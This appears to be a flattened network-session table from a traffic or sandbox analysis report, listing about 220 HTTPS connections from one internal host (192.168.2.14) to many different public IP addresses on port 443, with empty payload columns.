                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11223192.168.2.1434428121.142.238.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11224192.168.2.143767485.27.123.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11225192.168.2.145462847.221.57.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11226192.168.2.144403479.146.100.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11227192.168.2.143534267.211.156.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11228192.168.2.144759434.32.224.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11229192.168.2.1457572156.128.194.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11230192.168.2.1457620210.151.79.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11231192.168.2.1435366156.234.16.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11232192.168.2.1446862144.51.201.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11233192.168.2.145216488.135.99.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11234192.168.2.1440818210.28.244.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11235192.168.2.143379636.185.12.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11236192.168.2.144953879.102.75.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11237192.168.2.143615897.88.14.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11238192.168.2.143714077.62.214.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11239192.168.2.143460891.44.208.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11240192.168.2.1453832213.29.148.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11241192.168.2.145552698.68.203.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11242192.168.2.1435524174.80.219.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11243192.168.2.1456554118.1.27.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11244192.168.2.144434234.86.170.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11245192.168.2.144380035.174.136.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11246192.168.2.143503274.88.171.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11247192.168.2.145958458.94.57.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11248192.168.2.1452144207.30.104.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11249192.168.2.144955864.114.117.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11250192.168.2.145973678.126.89.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11251192.168.2.1452860148.206.145.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11252192.168.2.14558105.85.69.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11253192.168.2.145753032.188.98.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11254192.168.2.145608031.107.0.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11255192.168.2.143999863.65.183.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11256192.168.2.145052262.189.19.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11257192.168.2.145729641.14.28.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11258192.168.2.1434048123.48.148.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11259192.168.2.145086848.128.248.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11260192.168.2.145116013.195.248.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11261192.168.2.1448756124.240.78.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11262192.168.2.1454904199.3.186.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11263192.168.2.1456702101.25.43.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11264192.168.2.1450408196.102.195.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11265192.168.2.145228065.94.135.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11266192.168.2.1441066128.230.192.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11267192.168.2.1441468121.21.203.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11268192.168.2.1441950102.153.252.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11269192.168.2.1443052157.212.200.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11270192.168.2.143504261.190.60.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11271192.168.2.144381295.54.210.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11272192.168.2.1451646105.129.114.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11273192.168.2.1451710105.30.10.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11274192.168.2.14581344.183.118.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11275192.168.2.144103494.26.142.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11276192.168.2.1436092154.132.228.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11277192.168.2.1458812153.200.229.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11278192.168.2.1459510145.228.17.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11279192.168.2.144045064.242.101.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11280192.168.2.143628089.130.58.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11281192.168.2.144117444.65.223.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11282192.168.2.145121276.143.141.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11283192.168.2.1460176174.227.164.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11284192.168.2.1451340176.75.160.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11285192.168.2.144921625.162.211.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11286192.168.2.1447148164.188.10.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11287192.168.2.1447856191.186.157.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11288192.168.2.144610053.86.233.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11289192.168.2.1448140100.127.172.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11290192.168.2.1451746206.38.83.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11291192.168.2.1450602172.224.1.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11292192.168.2.1439400117.3.213.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11293192.168.2.1460290169.237.188.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11294192.168.2.1439820150.55.99.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11295192.168.2.1444094184.179.243.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11296192.168.2.1444662118.211.77.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11297192.168.2.144730019.125.155.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11298192.168.2.1447362125.241.1.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11299192.168.2.1445668207.58.123.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11300192.168.2.143955089.85.91.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11301192.168.2.144412876.221.73.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11302192.168.2.144541487.225.83.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11303192.168.2.144995094.211.197.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11304192.168.2.1433444174.60.103.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11305192.168.2.1458140120.74.185.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11306192.168.2.144232687.52.49.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11307192.168.2.1434116153.115.15.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11308192.168.2.143600825.127.200.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11309192.168.2.144178497.249.78.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11310192.168.2.1455036126.107.221.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11311192.168.2.145936883.59.243.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11312192.168.2.1454794178.83.240.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11313192.168.2.1437836116.9.77.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11314192.168.2.1437280182.133.237.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11315192.168.2.1450976118.87.126.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11316192.168.2.1439818178.145.111.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11317192.168.2.1453586146.220.154.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11318192.168.2.144010634.49.233.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11319192.168.2.1455792206.107.167.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11320192.168.2.1433350102.248.208.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11321192.168.2.144082825.70.53.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11322192.168.2.144745637.216.240.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11323192.168.2.1458546213.154.251.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11324192.168.2.1455054220.129.105.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11325192.168.2.1443548157.107.159.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11326192.168.2.1440310170.13.80.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11327192.168.2.1439140220.47.77.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11328192.168.2.1447086166.17.66.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11329192.168.2.1444020173.63.48.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11330192.168.2.1454912138.124.194.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11331192.168.2.1443618122.15.227.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11332192.168.2.1449526220.28.242.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11333192.168.2.143637252.162.241.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11334192.168.2.1456060200.249.215.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11335192.168.2.1439778193.216.123.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11336192.168.2.1458160203.105.250.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11337192.168.2.14345564.83.154.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11338192.168.2.1460010167.175.76.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11339192.168.2.1451552205.200.245.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11340192.168.2.1434968191.146.245.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11341192.168.2.1439204141.244.78.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11342192.168.2.1443232173.217.224.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11343192.168.2.1433214182.42.142.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11344192.168.2.1449240104.132.255.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11345192.168.2.145914247.147.235.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11346192.168.2.1447868162.149.84.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11347192.168.2.1441934166.201.80.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11348192.168.2.145465045.100.234.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11349192.168.2.146090823.231.96.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11350192.168.2.143698270.164.83.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11351192.168.2.143840084.31.57.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11352192.168.2.1453110118.122.203.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11353192.168.2.1455918176.227.19.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11354192.168.2.1443014175.11.89.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11355192.168.2.1441444151.182.148.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11356192.168.2.1441314192.0.15.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11357192.168.2.144886812.90.59.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11358192.168.2.144858085.54.77.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11359192.168.2.1439540115.55.24.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11360192.168.2.1443376131.210.217.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11361192.168.2.143585483.61.196.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11362192.168.2.1459436150.255.73.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11363192.168.2.144804461.222.239.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11364192.168.2.1436812178.130.42.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11365192.168.2.1443806181.251.177.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11366192.168.2.144516825.169.62.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11367192.168.2.1456822217.131.38.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11368192.168.2.14488389.212.243.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11369192.168.2.144797878.216.127.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11370192.168.2.145079285.160.92.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11371192.168.2.1436626124.53.203.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11372192.168.2.144787662.173.154.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11373192.168.2.145185218.194.58.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11374192.168.2.144061498.142.59.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11375192.168.2.1437060115.68.84.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11376192.168.2.145292434.251.132.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11377192.168.2.1446084187.0.208.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11378192.168.2.1439824114.204.243.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11379192.168.2.145282096.6.134.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11380192.168.2.1433880219.53.43.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11381192.168.2.1446994159.128.182.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11382192.168.2.144628262.182.104.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11383192.168.2.1440874222.253.60.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11384192.168.2.1457936115.251.40.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11385192.168.2.145855031.54.117.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11386192.168.2.1433460213.28.22.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11387192.168.2.144438820.105.164.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11388192.168.2.145437250.117.213.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11389192.168.2.1438066180.73.221.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11390192.168.2.1451150213.230.202.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11391192.168.2.1460906101.105.26.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11392192.168.2.1446928125.83.200.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11393192.168.2.1454304114.70.148.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11394192.168.2.1438042136.140.102.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11395192.168.2.1445338185.202.170.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11396192.168.2.1445834163.219.124.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11397192.168.2.144469432.94.51.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11398192.168.2.1460928125.12.219.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11399192.168.2.1455610149.177.69.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11400192.168.2.143569054.100.134.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11401192.168.2.1437476162.37.176.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11402192.168.2.1455000198.141.218.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11403192.168.2.144790051.222.23.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11404192.168.2.1454206191.155.7.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11405192.168.2.1445180119.205.37.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11406192.168.2.1448462218.159.203.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11407192.168.2.143422481.133.24.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11408192.168.2.145293293.142.249.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11409192.168.2.145746848.159.127.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11410192.168.2.1446200194.193.68.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11411192.168.2.1437590175.242.132.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11412192.168.2.144451031.91.219.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11413192.168.2.145019637.96.153.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11414192.168.2.145673667.249.21.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11415192.168.2.143591237.112.102.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11416192.168.2.1433432148.49.176.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11417192.168.2.145223053.72.60.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11418192.168.2.143918069.243.114.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11419192.168.2.1457520188.140.0.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11420192.168.2.143420860.240.193.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11421192.168.2.144432461.124.225.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11422192.168.2.1454824137.172.246.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11423192.168.2.1449136100.140.0.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11424192.168.2.1440734196.203.65.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11425192.168.2.144126486.186.171.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11426192.168.2.1446546217.230.75.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11427192.168.2.1438416144.152.43.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11428192.168.2.1443498168.54.227.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11429192.168.2.1456768186.191.4.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11430192.168.2.145467443.190.113.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11431192.168.2.145414048.45.237.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11432192.168.2.1451648128.109.103.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11433192.168.2.145591061.137.55.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11434192.168.2.1444920161.230.45.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11435192.168.2.1441540163.45.167.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11436192.168.2.145896099.0.19.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11437192.168.2.1445226188.233.134.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11438192.168.2.1453670167.234.239.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11439192.168.2.1434780209.232.219.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11440192.168.2.1442808213.173.192.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11441192.168.2.144131089.171.152.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11442192.168.2.1460868165.75.92.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11443192.168.2.1442906122.37.126.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11444192.168.2.1456550207.226.249.127443
